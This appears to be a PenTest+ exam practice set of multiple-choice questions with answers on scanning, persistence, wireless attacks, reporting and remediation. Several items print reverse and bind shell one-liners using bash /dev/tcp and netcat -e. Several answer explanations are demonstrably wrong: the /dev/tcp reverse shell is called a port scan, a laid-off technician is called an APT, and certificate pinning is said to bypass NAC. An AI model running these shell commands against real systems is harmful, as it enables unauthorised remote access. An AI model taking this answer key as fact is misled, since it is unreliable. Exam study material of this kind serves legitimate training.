PenTest+ - PQs
Which forms of a cross-site scripting (XSS) attack are considered to be a server-side exploits? (Choose two.) A. Stored/persistent B. Reflected C. Document Object Model (DOM) D. Clickjacking E. Directory transversal
A and B. Both the stored/persistent and reflected XSS exploits are considered server-side exploits because the malicious scripts are embedded on a server. When the user views the web page, the malicious scripts run, allowing the attacker to capture information or perform other actions.
Which of the following techniques can be used to help retain persistence for an exploit on a Windows system? (Choose two.) A. Using scheduled tasks B. Using cold boot attacks C. Implementing Kerberoasting D. Using DLL hijacking E. Looking for kernel exploits
A and D. DLL hijacking and scheduled tasks can both help retain persistence for an exploit on a Windows system. DLL hijacking causes the exploit contained in the malicious DLL to be loaded every time a linked application is started. Using scheduled tasks ensures that an exploit is run on a regular basis.
You have just concluded a black box penetration test for a client. During the test, you were able to access the organization's wireless network from the parking lot using your laptop running Aircrack-ng. In your final report, what should you recommend the client do to remediate this issue? (Choose two.) A. Use directional antennae on all access points. B. Reconfigure the Wi-Fi equipment to use WEP encryption. C. Upgrade to newer Wi-Fi equipment that supports modern encryption methods. D. Disable DHCP on the wireless network.
A and D. In this scenario, the wireless network can be hardened by using directional access points. This will help prevent the signal from emanating into the parking lot. In addition, DHCP should be disabled on the wireless network. While this makes administration much more difficult, it also prevents attackers who compromise the wireless network from automatically receiving all the configuration information they need to access network resources.
Which of the following can be considered OSINT related to the target of a penetration test? (Choose two.) A. Social media posts B. Results from an nmap scan C. Employees' Social Security numbers D. Corporate tax filings E. Personal tax filings of executive leadership
A and D. Open-source intelligence (OSINT) is any information that is publicly available and can be passively gathered. Because it is passively gathered, you can't use methods that actively engage the target organization to gather OSINT. For example, running a vulnerability scan is an active method, while reading social media posts and viewing corporate tax filings are passive methods. Social Security numbers and personal tax filings are both examples of protected information that is not publicly available.
Which type of vulnerability scan is least likely to be detected by an intrusion prevention system (IPS) or intrusion detection system (IDS)? A. Discovery B. Full C. Stealth D. Compliance
A. A discovery scan is designed to simply map out every system on the target network using very nonintrusive mechanisms (such as ping) to enumerate the network. Because of this, this type of scan is the least likely to be detected by an IDS or IPS device.
Which type of vulnerability scan is the least intrusive on the target network? A. Discovery B. Full C. Stealth D. Compliance
A. A discovery scan is designed to simply map out every system on the target network. As such, it uses very nonintrusive mechanisms (such as ping) to enumerate the network.
During a penetration test, the following line of code was found in an exploited machine's history file: bin/bash -i >& /dev/tcp/192.168.0.10/80 0> &1 What best describes what this command line does? A. A port scan has been performed. B. Obtains the web server's banner. C. Redirects a teletypewriter (TTY) to a remote system. D. Removes the error logs for the given IP.
A. In bash shell, a network socket can be opened to pass data through it. A TCP socket can be opened using /dev/tcp/<host>/<port>. Bash is attempting to open a TCP connection to the corresponding socket. So, in this example, a port scan has been performed. Here's a breakdown of the code: /bin/bash -i invokes an interactive bash shell. > &/dev/tcp/<host>/<port> pipes that shell to the tester. 0<&1 2>&1 takes standard input and connects it to standard output. Then it specifies to do the same with standard error (2>).
You work for a penetration testing firm. You have been scoping an upcoming penetration test with a client. Within the scope document, you include verbiage warning that the methodology and techniques used for this test could potentially take critical systems offline for a period of time. You ask the client to confirm that this is acceptable. What is this an example of? A. Assessing impact tolerance B. A comprehensiveness disclaimer C. A point-in-time disclaimer D. Rules for completing the assessment
A. In this example, you are assessing the client's tolerance for impacts. By including this verbiage within the scope, you protect your organization from litigation if the penetration test truly does knock critical systems offline.
Which nmap timing option causes it to scan in Paranoid mode? A. -T0 B. -T1 C. -T2 D. -T3 E. -T4
A. The -T0 option causes nmap to scan in paranoid mode, in which only one port is scanned on a target host every five minutes. While this mode can be used to run the stealthiest scans, it also causes them to run incredibly slowly
You have just finished writing a report of findings for a client after a penetration test. Which of the following is an appropriate way to store your client's written report of findings? A. Burn the report to an optical disk and store it in a locked safe bolted to your desk. B. Save the file to an encrypted flash drive. C. Copy the file to your phone. D. Save the report to a file on your workstation's desktop.
A. The written report of findings contains highly sensitive information and should therefore be securely handled. It should not be stored in a manner that would allow it to be easily stolen. In this scenario, burning the file to an optical disc and storing it in a secured safe would make it more difficult for the report to be stolen than the other options listed.
A client has asked you to run a white box penetration test. The goal is to assess the security of their web-based applications. These applications leverage the Simple Object Access Protocol (SOAP). During the scoping process, you determine that it would be helpful if you had access to the organization's internal documentation for these applications. Which of the following should you ask your client for? A. Web Services Description Language (WSDL) documentation B. Software Development Kit (SDK) documentation C. Web Application Description Language (WADL) documentation D. Application Programming Interface (API) documentation
A. Web Services Description Language (WSDL) is an XML-based interface definition language used for describing the functionality offered by a SOAP service
You are generating a written report of findings after a penetration test. In which section of the report should you provide the reader with a high-level synopsis of the test and the results? A. Executive summary B. Methodology C. Findings and remediation D. Metrics and measures
A. When creating your written report of findings after completing a penetration test, you should provide a high-level synopsis of the test and the results in the Executive Summary. Typically, this is the first section of the report and is intended for less-technical audiences
While reading an executable script file, you see a line near the beginning of the script that references the second value from an array using the following syntax: echo $PrimeNumArray[2] Which type of script could this be? A. PowerShell B. Bash C. Ruby D. Python
A. When referencing a value from an array, PowerShell uses the following syntax: $array_name[position]. In this example, the echo command is being told to display the second value of the array named PrimeNumArray on the screen.
A client has asked you to run a white box penetration test. The goal is to assess the security of several PC applications that were written in-house using the C++ programming language. These applications are used on a day-to-day basis by employees to manage orders, inventory, and payouts. During the scoping process, you determine that it would be helpful if you had access to the organization's internal software development documentation for these applications. Which of the following should you ask your client for? (Choose two.) A. Simple Object Access Protocol (SOAP) documentation B. Software Development Kit (SDK) documentation C. Web Application Description Language (WADL) documentation D. Application Programming Interface (API) documentation
B and D. Application programming interface (API) documentation describes how software components communicate. Software development kits (SDKs) also come with documentation. Organizations may create their own SDKs, use commercial SDKs, or use open source SDKs. Understanding which SDKs are in use and where they are can help a penetration tester test applications, especially those written in-house.
A Windows server is functioning as an Active Directory domain controller for an organization's network. Which of the following services are not required for it to fulfill this role? (Choose two.) A. Group Policy Management B. Hyper-V C. Role Administration Tools D. Active Directory Federation Services
B and D. Every network service enabled on a server expands that server's attack surface. Therefore, only those services that are actually needed should be installed. In this scenario, the domain controller shouldn't be running Hyper-V, which is used for virtualization. Likewise, Federation Services is used only in situations where one Active Directory domain is linked to ("federated") with a different Active Directory domain
Which of the following tools can be used to restore the original plain text password from the hash of that password? A. proxychains B. John the Ripper C. A rainbow table D. TheHarvester
C. A rainbow table is a precomputed table of hash values that can be used to reverse hash functions. For example, if a plaintext password has been protected by hashing it, you may be able to use a rainbow table to reverse the hashing function and expose the original plaintext password
Within a Bash script, you want to send the standard output and the standard error from the tail /var/log/firewall command to a file named lastevents in the current directory. Which command could you add to the script to do this? A. tail /var/log/firewall 1> lastevents 2> lastevents B. tail /var/log/firewall > lastevents C. tail /var/log/firewall 1> lastevents 2> &1 D. tail /var/log/firewall 1&2> lastevents
C. Adding the tail /var/log/firewall 1> lastevents 2> &1 command to a Bash script will send both stdout and stderr to the same file.
A few days after exploiting a target with the Metasploit Meterpreter payload, Robert loses access to the remote host. A vulnerability scan shows that the vulnerability that he used to exploit the system originally is still open. What has most likely happened? A. A malware scan discovered Meterpreter and removed it. B. The system was patched. C. The system was rebooted. D. Meterpreter crashed.
C. Meterpreter is a memory resident tool that injects itself into another process. The most likely answer is that the system was rebooted, thus removing the memory resident Meterpreter process. Robert can simply repeat his exploit to regain access, but he may want to take additional steps to ensure continued access.
Which option causes nmap to scan a host for the 100 most commonly used IP ports, such as 20, 21, 23, 25, 53, 80, etc.? A. -p- B. -sV C. -F D. -p 100
C. The -F option causes nmap to scan a specified number host for the 100 most commonly used IP ports. For example, this scan would include ports 20, 21, 23, 25, 53, 80, and so on. Sometimes, this is called a fast port scan
You are planning on setting up a security assessment. Which of the following has a major impact on the budget of the assessment? A. Compliance requirement B. Scheduling C. Scoping D. Target risk
C. The first step in most penetration testing engagements is determining what should be tested, often called the scope of the assessment. The scope of the assessment determines what penetration testers will do and how their time will be spent. Thus, this is a major impact on the budget of an assessment.
Which command can be used from within an if/then flow control structure in a Bash script to evaluate whether a specified condition is true? A. eval B. == C. test D. <>
C. The test command can be used from within an if/then flow control structure to evaluate whether a specified condition is true
You are generating a written report of findings after a penetration test. During the test, you discovered that many older Windows workstations in the network haven't been patched properly and are susceptible to the WannaCry ransomware. Where should you include this information in your report? A. Executive summary B. Methodology C. Findings and remediation D. Metrics and measures E. Conclusion
C. When creating your written report of findings after completing a penetration test, you should list the vulnerabilities you discovered in the Findings and Remediation section of the report, along with how you found them.
While reading an executable script file, you see a line near the beginning of the script that declares a variable using the following syntax: _ServerName = FS1 Which type of script could this be? A. PowerShell B. Bash C. Ruby D. Python
C. When declaring a local variable, Ruby uses a syntax of _variable_name = value.
Which of the following provides an infrastructure for managing Windows systems over the network from a centralized location? A. SMB B. VNC C. WMI D. RDP
C. Windows Management Instrumentation is an infrastructure provided by Microsoft for centrally managing Windows systems over a network connection.
As a part of a penetration test, you want to reverse compile the executable for an in-house developed application used by the target organization. Which of the following tools can be used to do this? (Choose two.) A. IDA B. Hopper C. route D. Tableau E. FTK
A and B. Both IDA and Hopper can be used for decompilation. During this process, an executable file is reverse-compiled into source code, allowing you to examine it for vulnerabilities.
You have just concluded a black box penetration test for a client. The organization's wireless network uses preshared keys. During the test, you were able to access the organization's wireless network from the parking lot using your laptop running Aircrack-ng. In your final report, what should you recommend the client do to remediate this issue? (Choose two.) A. Implement MAC address filtering. B. Implement 802.1x authentication. C. Upgrade to newer Wi-Fi equipment that supports modern encryption methods. D. Change the default administrative username and password on the access point. E. Reconfigure the Wi-Fi equipment to use WPA encryption.
A and B. In this scenario, the wireless network can be hardened by implementing MAC address filtering. This provides a basic layer of protection by preventing unauthorized systems from connecting to the wireless network. However, MAC addresses are easy to spoof once a known-good address has been identified. So, the wireless network can be further hardened by implementing 802.1x authentication. This eliminates the weakness associated with preshared keys by implementing a separate authentication server (such as a RADIUS server)
As a part of a penetration test, you need to gather user account names and passwords from the passwd and shadow files from a Linux server. Which utilities could you use to do this? (Choose two.) A. John the Ripper B. Cain and Abel C. Kismet D. Censys E. Recon-ng
A and B. John the Ripper as well as Cain and Abel can be used to crack passwords from an offline database of user accounts, such as the shadow and passwd files from a Linux system.
Which of the following are vulnerabilities associated with the SNMPv1 protocol? (Choose two.) A. The community string is valid for every SNMPv1 node. B. The community string is transmitted as clear text. C. The community string uses the weak RC2 cipher. D. No authentication is required to communicate with an SNMPv1 host. E. The Management Information Base (MIB) is stored in unencrypted format.
A and B. The SNMPv1 protocol is an older protocol that uses the concept of a community string instead of a password. The same community string is used to authenticate to every SNMPv1 host in the network. By convention, most SNMPv1 administrators set the community string to a value of public. Even if a unique community string were used, it was easy to discover because it was transmitted as clear text on the network.
Which of the following are ways in which services on a Windows system can be exploited? (Choose two.) A. Using unquoted service paths B. Replacing executables for writable services C. Implementing a cold boot attack D. Compromising credentials in LSASS
A and B. Using unquoted paths to services is one way that services can be exploited on a Windows system. By not quoting paths to services, any spaces in a directory name won't be processed correctly and can cause a malicious service executable located deliberately in the resulting unquoted directory path to be loaded instead of the correct service executable. In addition, writeable service executable files can be replaced with malicious executables with the same file name.
You are defining the rules of engagement (ROE) for an upcoming penetration test. This will be a gray box assessment. This will be an internal test. What limitations might you expect to encounter as you conduct the assessment? (Choose two.) A. You will have limited network access. B. You will experience pushback from the internal IT staff. C. You will have limited storage access. D. You will not be allowed to enter the organization's facility. E. You will not be allowed to run vulnerability scans in the organization's network infrastructure devices, such as servers, routers, and switches.
A and C. Because this is a gray box test, you can expect to have limited network access and limited storage access. Essentially, you can expect to have a level of knowledge and access similar to what the average employee within the organization would have.
You are scoping an upcoming external black box penetration test for the client. You are trying to determine what will be included in the test and what won't. Which of the following questions should you ask the client? (Choose two.) A. Should the test focus on a specific known vulnerability? B. Will the client grant physical access to their facility? C. Should the test look for unknown vulnerabilities? D. Will the client provide administrator-level accounts to conduct the assessment?
A and C. Part of the scoping process is to determine whether the penetration test will assess the organizations susceptibility to a specific known vulnerability or whether it should investigate unknown vulnerabilities. Because this is an external black box test, the client probably won't provide user accounts or physical access to their facility.
What are the functions of the Server Message Block (SMB) protocol? (Choose two.) A. To share files on the network B. To transfer email messages between mail transfer agents (MTAs) C. To share printers on the network D. To map IP addresses to MAC addresses E. To transfer email messages to a mail user agent (MUA)
A and C. The Server Message Block (SMB) protocol is used to share files and printers between hosts on a network.
You have just met with a new client that has requested that you perform a penetration test for them. The client manages a string of retail storefronts that accept credit cards. They need you to assess whether they are PCI-DSS compliant. Which of the following tests need to be included in the assessment? (Choose two.) A. Monitor all access to cardholder data. B. Ensure that WPA2 is used to secure all wireless networks. C. Ensure that TKIP is used to secure all wireless networks. D. Restrict access to cardholder data on a need-to-know basis.
A and D. The Payment Card Industry Data Security Standard (PCI-DSS) is a set of security controls that businesses are required to implement to protect credit card data. For example, two of the requirements specify that the organization must monitor and audit all access to cardholder data and that access to that data must be restricted on a need-to-know basis.
Which of the following are true of the Link-Local Multicast Name Resolution (LLMNR) protocol? (Choose two.) A. It is commonly used in the absence of a DNS server. B. It is not supported by Linux hosts. C. It is not supported by Windows hosts. D. It is used only by routers, not by workstations or servers. E. It allows the IPv6 host to resolve hostnames on the same local link.
A and E. The LLMNR protocol is loosely based on the DNS packet format and allows IPv4 and IPv6 hosts to perform name resolution for other hosts on the same local network without a DNS server. It is supported by both Windows and Linux hosts.
A penetration tester is conducting a test and gains access into an unrestricted system network by using port 443. The tester wants to create a reverse shell from the client back to the tester. Which of the following methods is most likely what the tester will use? A. bash -i >& /dev/tcp/<DESTINATIONIP>/443 0>&1 B. nc -e /bin/sh <SOURCEIP> 443 C. perl -e 'use SOCKET'; $i='<SOURCEIP>; $p='443; D. ssh superadmin@<DESTINATIONIP> -p 443
A. A reverse shell opens a communication channel on a port and waits for incoming connections. The client's machine acts as a server and initiates a connection to the tester's machine. This is what is done by using the following: bash -i >& /dev/tcp/<DESTINATIONIP>/443 0>&1 Given the options, A is the best option. B and C will not work because they are using the <SOURCEIP> and not the <DESTINATIONIP>. Option D is not correct because it is using the improper syntax.
Alaina wants to conduct a man-in-the-middle attack against a target system. What technique can she use to make it appear that she has the IP address of a trusted server? A. ARP spoofing B. IP proofing C. DHCP pirating D. Spoofmastering
A. ARP spoofing attacks rely on responding to a system's ARP queries faster than the actual target can, thus allowing the attacker to provide false information. Once accepted, the attacker's system can then act as a man in the middle. Chapter 7 explores man-in-the middle attacks, methods, and uses.
As you are conducting a penetration test for a client, you want to make sure the post-engagement cleanup process goes smoothly. What should you do to accomplish this? A. Carefully document everything you do as you conduct the test. B. Create back doors in critical systems so you can easily access them later. C. Create images of all systems and devices so they can be restored to their pre-test state. D. Erase any log entries created by your exploits.
A. After a penetration test, it is critical that you undo everything you have done. The best way to accomplish this is to carefully document everything you do as you conduct the test. That way, you will have a record of what must be restored and how it should look after the cleanup is complete
Which of the following tools can be used by a system administrator to ensure the network is in configuration compliance? A.Nikto B. Tableau C. AFL D. IDA Pro
A. Although Nikto is usually considered a vulnerability scanner used by penetration testers, it can also be used by system administrators to verify configuration compliance within their networks, specifically with the configuration of their web servers
A penetration tester has been asked by a client to imitate a recently laid-off help desk technician. What best describes the abilities of a threat actor? A. Advanced persistent threat (APT) B. Hacktivist C. Organized crime D. Script kiddie
A. An advanced persistent threat (APT) is a computer network attack in which a person or group gains unauthorized access to a network and remains undetected for an extended period of time. APTs provide the highest level of threat on the adversary tier list. Many of the techniques used by advanced persistent threat actors are useful for penetration testers, and vice versa. If your persistence techniques aren't monitored for or detected by the client's systems, the findings should include information that can help them design around this potential problem.
While performing a gray box penetration test, you have discovered that the target organization uses many different operating systems on their computers. You've fingerprinted Windows, Mac OS, and Linux systems. You even found one UNIX server system. In addition, employees are bringing their mobile devices to work and connecting them to the organization's wireless network, so you found many Android and iOS devices. At this point in the test, you need to identify operating system vulnerabilities that exist with high-value devices. What should you do? A. Research the Common Vulnerabilities and Exposures (CVE) database. B. Research the Common Attack Pattern, Enumeration and Classification (CAPEC) database. C. Research the Computer Emergency Response Team (CERT) website. D. Post a question on a penetration testing forum.
A. An effective way to discover vulnerabilities associated with a specific version of an operating system is to consult the Common Vulnerabilities and Exposures (CVE) database. The CVE database can be accessed at http://cve.mitre.org. It contains a list of publicly known cybersecurity vulnerabilities. Whenever a vendor discovers a vulnerability with their product, they add an entry to the CVE database. This database contains vulnerability information for Windows, Mac OS, Linux, UNIX, Android, and iOS operating systems
A penetration tester impersonates a vending machine repair person to gain physical access to the target organization's facility. Once inside, he notices that the door to the server room uses a simple pushbutton door lock that doesn't use any kind of electronic authentication. Which physical security attack could he use to gain access to the server room? A.Lock picking B .Tailgating C. Fence jumping D. Egress sensor bypass
A. Because the server room is protected by a relatively unsophisticated locking mechanism, the penetration tester could pick the lock to gain access, assuming he has the necessary lock-picking skills. Note that this would have to be done in an area without surveillance or foot traffic as it may take some time to complete.
You are a performance tester, and you are discussing performing compliance-based assessments for a client. Which is an important key consideration? A. Any additional rates B. Any company policies C. The industry type D. The impact tolerance
A. Budgeting is a key factor of the business process of penetration testing. A budget is required to complete a penetration test and is determined by the scope of the test and the rules of engagement. For internal penetration testers, a budget may just involve the allotted time for the team to perform testing. For external testers, a budget usually starts with the estimated number of hours based on the intricacy of the testing, the size of the team, and any associated costs
During a web application penetration test, a penetration tester observes that the content security policy header is missing. What type of attack would the tester most likely perform next? A. A clickjacking attack B. A command injection attack C. A directory traversal attack D. A remote file inclusion attack
A. Clickjacking is when a tester uses multiple transparent layers to trick a user into clicking a button or link on another page when they were intending to click the top-level page. The tester is "hijacking" clicks and routing them to another page. In web browsers, clickjacking is a browser security issue that is a vulnerability across a variety of browsers and platforms. A clickjack takes the form of embedded code or a script that can execute without the user's knowledge, such as clicking a button that appears to perform another function.
During the information gathering phase of a black box penetration test, you need to eavesdrop on radio frequency emissions emanating from the target's facility and attempt to capture data from its wireless network. You are parked in the organization's parking lot. You want to use aircrack-ng to crack the encryption used by the Wi-Fi network. To accomplish this, you first need to capture the authentication handshake. Which utility should you run on your laptop to do this? A. airodump-ng B. aireplay-ng C. aircrack-ng D. nmap
A. First run airodump-ng utility on the specific channel used by the transmitting access point to collect the authentication handshake.
You are a penetration tester, and you want to capture user hashes on a Windows network. You want to gather broadcast messages and have the ability to authenticate with hashes once you have captured them. What tool should you use? A. Impacket B. Metasploit C. Responder D. Wireshark
A. Impacket is a collection of Python classes for working with network protocols. Impacket provides a wide range of tools, including the ability to authenticate with hashes once you have captured them. Metasploit's SMB capture mode, Responder, and Wireshark can all capture SMB hashes from broadcasts, but in this scenario, you also want the ability to authenticate with hashes once you've captured the messages.
You have just concluded a penetration test for a client that makes extensive use of work-at-home employees. The employees use a VPN connection. During the test, you were able to use social engineering to compromise an employee's VPN connection and gain access to the internal network. As a mitigation strategy, you recommend that the client implement multifactor authentication for all VPN connections. What type of solution is this? A. Technological B. People C. Process E. Tactical
A. Implementing multifactor authentication for VPN connections is an example of a technological mitigation strategy
John wants to retain access to a Linux system. Which of the following is not a common method of maintaining persistence on Linux servers? A. Scheduled tasks B. Cron jobs C. Trojaned services D. Modified daemons
A. The Windows task schedule is used for scheduled tasks. On Linux, cron jobs are set to start applications and other events on time. Other common means of creating persistent access to Linux systems include modifying system daemons, replacing services with trojaned versions, or even simply creating user accounts for later use
You are a security analyst, and you are reviewing the results of a recent internal vulnerability scan that was performed against intranet services. The scan reports indicated that there was a critical vulnerability. The report indicated the following: Title: Remote Command Execution vulnerability in web server Rating: Critical (CVSS 10.0) Threat actor: any remote user of the web server Confidence: certain Recommendation: apply vendor patches What should you do first? A. Apply a risk rating and how it affects the organization. B. Exploit the server to determine whether the scan indicated a false positive. C. Inform senior management about the vulnerability. D. Organize for critical out-of-cycle patching.
A. In this scenario, it asks what the security analyst should do first. Once the vulnerability has been identified, you need to rate the risk and how it affects your organization. The rating will determine whether it is safe enough to continue with the work or whether you need to adopt additional control measures to reduce or eliminate the risk. The rating depends upon the likelihood of an event occurring and the severity of the vulnerabilities. This is done by figuring out whether the likelihood is Low, Medium, or High and then doing the same for impact. The 0 to 9 scale is split into three parts: 0 to <3 is Low, 3 to <6 is Medium, and 6 to 9 is High
You have just concluded a penetration test for a client. In your findings, you report that a web application that was developed in-house and that the organization uses to manage customer orders is susceptible to SQL injection attacks. What should you recommend the client do to remediate this? A. Escape data. B. Implement SSL for network communications. C. Require 2FA when authenticating users. D. Salt the hash.
A. In this scenario, you could recommend that the application be rewritten such that data is escaped. Escaping is the process of securing data by stripping out unwanted information, such as malformed HTML or script tags. This prevents data from being seen as code. Escaping data helps secure information prior to rendering it for the end user and helps prevent SQL injection as well as cross-site scripting attacks.
Which of the following features of an egress sensor can be manipulated to allow a penetration tester to enter a building without authorization? A. Emergency fail open B. Automatic locking C. Automatic unlocking via motion sensor for egress D. Automatic unlocking via light sensor for egress
A. Most automatically locking door systems have some type of emergency fail open mechanism. The idea behind this is that if there is an emergency of some sort, such as a fire, then the doors must automatically unlock to prevent people from being trapped inside or preventing emergency personnel from entering. If you can figure out what fail open mechanism is used, you may be able to manually trigger it to open a locked door
During the information gathering phase of a gray box penetration test, you run the NBTSTAT -c command on the local network. One of the lines in the output reads as follows: Name Type Host Address Life [sec] ------------------------------------------------------------ DEV-1 <20> UNIQUE 10.0.0.3 517 What do you know about the DEV-1 host? A. It is a server. B. It is a workstation. C. It is a router. D. It is a wireless device.
A. NBTSTAT identifies NetBIOS servers with an ID of <20>. Based on this output, you know that DEV-1 is most likely a Windows server (or a Linux server running the Samba service).
A penetration tester is conducting a test and has compromised the client's host. What is the correct syntax to create a Netcat listener on this device? A. nc -lp 4444 -e /bin/bash B. nc -lvp 4444 /bin/bash C. nc -p 4444 /bin/bash D. nc -vp 4444 /bin/bash
A. Netcat can be used to set up a Telnet server in a matter of seconds. You can specify the shell you want Netcat to run at a successful connection with the -e parameter. In this scenario, the proper syntax would be nc -lp 444 -e /bin/bash. The nc - tells Windows to run the nc.exe file with the following arguments: -l: Listen mode, for inbound connections -p: Specifies a port to listen for a connection on -e: Tells what program to run once the port is connected to (cmd.exe) -v: Specifies to be verbose, printing out messages on Standard Error, such as when a connection occurs
You have just concluded a penetration test for a client. In your findings, you report that users are allowed to keep the same password indefinitely, which increases the likelihood that they will be compromised at some point. Given that the client users Linux desktops and servers, which of the following Linux commands should you recommend they use to fix this issue? A. chage B. chmod C. chgroup D. chown
A. The chage command can be used on Linux systems to configure password aging for user accounts.
You are a penetration tester and have run the following Nmap scan on a computer: nmap -sV 192.168.10.5. The client indicated that it had disabled Telnet from its environment. However, the Nmap scan results show that port 22 is closed and that port 23 is open to SSH. What might have happened to cause this? A. The organization did not disable Telnet. B. The nmap results contain a false positive for port 23. C. The service is running on a nonstandard port. D. Port 22 is filtered.
A. Network Mapper (Nmap) is used to discover hosts and services on a computer network by sending packets and analyzing the responses. Nmap will identify what devices are running on a client's systems, discover hosts and services that are available, find open ports, and detect security risks. In this scenario, the organization did not disable Telnet because port 23 is still open. Telnet is a client-server protocol, based on a reliable connection-oriented transport. Typically, this protocol is used to establish a connection to Transmission Control Protocol (TCP) by using port 23, where a Telnet server application (telnetd) is listening.
You are scoping a white box penetration test for a client. The client has implemented network access controls (NAC) with IPSec to prevent devices that are out of compliance with company policies from connecting to the secure internal network. Because you are conducting a white box test, your testers' systems need to bypass NAC and be granted direct access to internal secure network. What should the client do to accomplish this? A. Configure certificate pinning. B. Connect their computers to a switch port that is on the secure internal network. C. Configure a NAC exception for each system. D. Temporarily disable NAC.
A. Normally, when NAC is implemented with IPSec, clients must meet company security policies before they are allowed to connect to the internal secure network. If they do, they are assigned a digital certificate that allows them to communicate with other systems on the internal secure network. To bypass NAC, certificate pinning can be used to assign a digital certificate to the testers' systems without proving they are in compliance every time they connect.
During a gray box penetration test, you discover an open SMTP service running on an older database server. You want to use this SMTP service to send whaling emails to the organization's CEO and CFO. How can you do this remotely from your laptop? A. Telnet to the SMTP server's IP address on port 25 and create the messages. B. Use physical security exploits to gain access to the server console where you can create the messages. C. Use impersonation to trick the server administrator into revealing its Remote Desktop password. D. None of the above.
A. One way to leveraging an open SMTP service to send unauthorized email messages is to connect to the SMTP server's IP address on port 25 using a Telnet client. Once the connection has been established, you can use the command-line interface to create and send the messages.
You have just concluded a penetration test for a client. During the test, you were able to use John the Ripper to brute force an administrative password on a sensitive Windows file server. To address this vulnerability, you recommend that the client implement Group Policy settings that require complex passwords as well as lock the system after three incorrect logon attempts. What type of solution is this? A. Technological B. People C. Process D. Scalable
A. Requiring complex passwords and implementing account restrictions are examples of technological mitigation strategies.
Which Windows feature could potentially allow authentication credentials to be transferred as clear text over a network connection? A. Unattended installations via PXE B. JTAG debug C. Remote Desktop D. Domain join
A. Running unattended installations over the network using the Preboot Execution Environment (PXE) could potentially result in authentication credentials being transferred as clear text. During the unattended install, a special file called the answers file is used to automate the installation process. If the answers file contains user account information to be created on the system during the install, that information is transferred as clear text.
You are performing a gray box penetration test. You are performing a vulnerability scan on the internal network using a stealth scan. The target network has an IDS device installed. What is likely to happen? A. The IDS will detect the stealth scan. B. The stealth scan will remain undetected by the IDS. C. The IDS will block traffic from your scanning system. D. The stealth scan will establish full TCP connections with each host on the target network.
A. Stealth scans currently aren't considered as stealthy as they used to be. Most modern IDS/IPS devices can detect the unusually high frequency of RST packets on the network created during a stealth scan and take the appropriate action. For example, an IDS can generate an alert. An IPS can generate an alert and also block traffic from the scanning host.
Which of the following Windows Group Policy settings should never be enabled? A. Store passwords using reversible encryption B. Password must meet complexity requirements C. Minimum password length D. Certificate path validation settings E. Certificate services client - Auto-enrollment
A. The "Store passwords using reversible encryption" policy is highly insecure. It is included in modern deployments to provide backward compatibility with older applications. A client who has this policy turned on should be advised of the security consequences and to consider upgrading to newer applications that don't require it.
You've heard that a new physical security exploit is going around where the attacker uses a special type of key called a bump key. Which open source research source would most likely contain information about how this exploit works? A. CAPEC B. Full Disclosure C. NVD D. CVE
A. The CAPEC database contains information about known attack patterns used to exploit weaknesses, including physical security vulnerabilities.
Which of the following is a service that runs on a Windows system and enforces the security policy of the system? A. LSASS B. Key distribution center (KDC) C. Group Policy Object (GPO) D. LDAP
A. The Local Security Authority Subsystem Service (LSASS) is a process that runs on a Windows system to enforce the security policy on the system. It verifies users that log on to the system, manages user password changes, creates access tokens, and makes entries to the Security log.
You are conducting a gray box penetration test for a client. You need to use the nmap utility on your laptop to discover all the hosts on the 192.168.1.0 subnet (which uses a subnet mask of 255.255.255.0) without actually scanning those hosts. Which command should you use to do this? A. nmap 192.168.1.0/24 -sL B. nmap 192.168.1.0/24 --list C. nmap 192.168.1.1-254 -sW D. nmap 192.168.1.1-254 -sM
A. The nmap 192.168.1.0/24 -sL command causes the nmap utility to scan the specified range of IP addresses for hosts. It simply lists targets to scan.
You are conducting a gray box penetration test for a client. You have identified an internal host with an IP address of 192.168.1.1 as a potential target. You need to use the nmap utility on your laptop to run a TCP ACK scan of this host. Which command should you use to do this? A. nmap 192.168.1.1 -sA B. nmap 192.168.1.1 -T1 C. nmap 192.168.1.1 -sT D. nmap 192.168.1.1 -ACK
A. The nmap 192.168.1.1 -sA command causes the nmap utility to conduct a TCP ACK scan of the specified target system
You need to dispose of several penetration test reports from old clients. The files are stored on flash drives that are stored in a locked cabinet. Which of the following is the best way to do this? A. Smash the drives with a hammer. B. Delete the files from the drives. C. Use the Disk Management utility to repartition the drives. D. Reformat the drives using File Explorer in Windows.
A. The written report of findings contains highly sensitive information and should therefore be disposed of securely. It should not be disposed of in a manner that would allow it to be stolen or reconstructed. In this scenario, physically destroying inexpensive flash drives will make it much harder to recover the data from the reports
A penetration tester reviews social media accounts owned by the target organization's CIO and makes a list of possible passwords such as her spouse's name, pet's name, favorite sports teams, and so on. The tester tries to log on to the CIO's account using one possible password after another, trying to find one that works. What type of authentication exploit is this? A. Credential brute-forcing B. Session hijacking C. Redirect attack D. Password cracking
A. This is an example of a credential brute-forcing attack. In a true brute-force attack, all possible letter, number, and special character combinations would be tried one after another until the right one is found. However, by creating a list of likely passwords based on the user's personal interests, the probability of success is greatly increased.
Mike discovers a number of information exposure vulnerabilities while preparing for the exploit phase of a penetration test. If he has not been able to identify user or service information beyond vulnerability details, what priority should he place on exploiting them? A. High priority; exploit early. B. Medium priority; exploit after other system and service exploits have been attempted. C. Low priority; only exploit if time permits. D. Do not exploit; information exposure exploits are not worth conducting.
A. While it may seem odd, exploiting information gathering exploits early can help provide useful information for other exploits. In addition, most information gathering exploits leave very little evidence and can provide information on service configurations and user accounts, making them a very useful tool in a situation like the scenario described.
As the part of information gathering process during a gray box penetration test, you need to perform a certificate inspection on the target organization's internal web server. Which utility could you use on your Kali Linux laptop to do this? A. sslyze B. Zenmap C. nmap D. hping
A. the sslyze tool is a pentesting tool that is commonly used to perform certificate inspection
What are the risks of enabling serial console connections on network devices such as routers and switches? A. Network administrators tend to not secure them properly. B. They are prone to data emanation. C. It is easy for attackers to connect to them. D. It is easy for attackers to sniff data from them.
B .The risk associated with enabled serial console connections on network devices is the fact that network administrators tend to not secure them properly. Because they can be accessed only with a direct point-to-point connection, they don't configure them to require authentication. Using impersonation, this makes it easy for a penetration tester to access the device, as long as they can get physical access to it.
You are performing a black box penetration test. You want to perform an evil twin attack to capture wireless user data. Which of the following tasks would you need to complete? (Choose two.) A. Implement a fragmentation attack. B. Send deauth frames to deauthenticate wireless clients. C. Reconnect wireless clients to an access point with the same SSID as the target organization. D. Use a brute-force attack to break the WPS pin. E. Repeat the wireless network signal.
B and C. In a typical evil twin attack, the tester first conducts a deauthentication attack to disconnect victims' wireless devices from the real network. These devices then automatically reconnect to the tester's wireless access point that has been configured with the same SSID as the target organization. The tester will likely boost the gain on the evil twin's radios because most wireless network interfaces will default to the access point with the strongest signal.
